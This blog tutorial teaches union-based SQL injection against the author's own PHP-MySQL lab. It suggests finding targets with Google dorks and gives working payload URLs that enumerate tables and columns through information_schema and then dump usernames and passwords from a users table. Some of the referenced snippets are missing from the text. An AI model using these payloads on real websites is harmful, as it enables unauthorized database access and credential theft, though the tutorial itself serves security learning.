Basics of SQL Injection Attacks

Basics of SQL Injection Attacks

What is SQL Injection?

SQL Injection is a Code Injection technique to attack Data-driven applications. Despite being around for many years, SQL Injection (SQLi, for short) is still a hugely dominant security flaw in web applications.

sql injection by ahsanshabbir.com

An attacker can send SQL Queries as a part of the command or input parameters. Through SQL Injection attacker can obtain unauthorized access to a database and he might be able to create, read, update, alter, or delete data stored in the back-end database. Although SQL injection is most commonly used to attack websites.


Key Concepts of SQLi Injection

  • SQL Injection occurs when an untrusted user sends SQL Query as a part of Input parameter, cookie fields or any other header contents variable which forwards it’s value to SQL interpreter.
  • Attackers send specially crafted input data to the SQL interpreter and trick the interpreter to execute unintended commands.
  • An SQL injection attack exploits security vulnerabilities at the database layer. An attacker can create, read, modify or even delete sensitive data.

Note: Authors of this blog highly discourage you to perform these attacks on actual targets. We, hereby, take no responsibility for any of your actions, good or bad.

Picking up a target

The first and the foremost step to perform a SQL injection attack is to look for a vulnerable website. You can use Google Dorks to find out different websites. (A Google dork is a specified search query which finds different websites according to your query). For Example:

 

These dorks will return a huge number of websites in Google Search result. But again, Injecting website without the owners’ permission could get you in real trouble. So It’s wise to practice SQL Injection attacks on your own Lab. For this purpose, I have built my own SQL Injection lab. You can download my PHP-MySQL Injection lab from here Anyways, at the end you will find a website with url something like

However, I’m using my own lab, so my case target url is

 

To find out if this website is vulnerable to SQL injection, simply add an apostrophe at the end of the URL like this:

If the website return some SQL Error or any content on the page go missing. Then the website is vulnerable to SQL Injection vulnerability and we may continue our attack.


Performing the attack

After finding the vulnerability on the website, we have to find the number of columns the website is fetching from back-end database in its current query and also how many columns are accepting our query and display results accordingly. In order to find this out append an “order by” clause to the url.

MySQL Error Unknown column 6 order by clause

“Order by” Keyword is basically used to sort the result-set according to input column. However, we’ll use this keyword to find the number of total columns by sorting the result set according to the last column. For this purpose, we have to increase this column number until we get an error. In this case we get an error on “order by 6” that means the highest number of columns in current query is 5.

 

At this stage we have the total number of columns and can inject another SELECT statement as the part of the input. Now we can do this with “UNION” keyword to do add another SELECT statement But, It follows certain rules. For Example, if  the current query is using something like:

Then we cannot inject another select query like:

It will return an error. Because the number of columns provided in the Second Select statement is different from first Select Statement. That’s Why we used order by keyword to find the number of columns in the first statement earlier.


Coming back to actual scenario, Let’s Inject this website.

What we have at this point?

  1. A Vulnerable parameter where we can inject our query.
  2. Total Number of Columns in current Query.

What are our Goals?

  1. Injecting another SELECT statement in the running query.
  2. Finding which column is accepting our Query.
  3. Finding all the table names in the current database.
  4. Finding all the column names of a particular table.
  5. Dumping data from the database.

 

To find out the column, which accepts our queries we use the  UNION SELECT statement with the number of columns we have in previous select statement. I.e.

We can perform the above action in our browser with a URL like this:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,2,3,4,5

isolated UNION SELECT result

Note that ” – ” hyphen in the URL, I used this to isolate the results of the Second SELECT Query. 

Now, instead of normal page, we can see some numbers on the page. These numbers are in fact the column numbers in our second SELECT statements on which we can perform queries and return results. In current scenario we can see column number  2, 3 and 4 are being printed on the page. We can use anyone of these to continue our injection.


Finding all the table names in the current database.

To fetch the table names from the current database is slightly different from actual methods. I.e. In MySQL console we use:

But this would not work here. In this type of SQL Injection We have to fetch everything using SELECT Statement. We are bound to use something like:

In our scenario we will use following URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.tables WHERE table_schema=Database()),3,4,5

tables list

As you can see in the snapshot, Query returned the list of tables separated by commas. Current Database has only 2 tables in the database.

  1. Products
  2. Users

Finding column names

Our ultimate goal is to dump data from the database and to achieve this goal, As data sits in Tables in their relevant fields So we must have to find the table names first (which we already have in the previous step) and after that we also need to find field names of that table i.e. Column names. In order to do that we use query something like:

URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=’users’ and table_schema=Database()),3,4,5

If that does not work, you might need to convert your table name into Hex in order to avoid single quotes.

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x<hex_of_table_name_here_> and table_schema=Database()),3,4,5

I.e.

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name=0x7573657273 and table_schema=Database()),3,4,5

columns.png

We found the following column names in “users” Table

  1. Id
  2. Username
  3. Password
  4. Email

 


Dumping Data – Final Step

At this point we have

  1. A target web site with a parameter vulnerable to SQL Injection
  2. Number of Total columns in the query and the columns which accept and print result on the screen.
  3. Table Names
  4. Column names of the Table.

 

Now the only thing left is to use this information and dump the actual data from the database. For instance, Let’s dump all the records from “users” table. In order to do that we can use something like

URL:

http://localhost/private/lab/lab-2/view.php?id=-1 UNION SELECT 1,(SELECT GROUP_CONCAT(username,0x3a,password,0x3c62723e) FROM users),3,4,5

 

records.png

 The Database returned following records: 

admin:admin123

ahsan:ahsan123

This tutorial ends here. If you’re not familiar with SQL commands being used here you can study them Here.  Thank you for reading.

 

 

Comments are closed.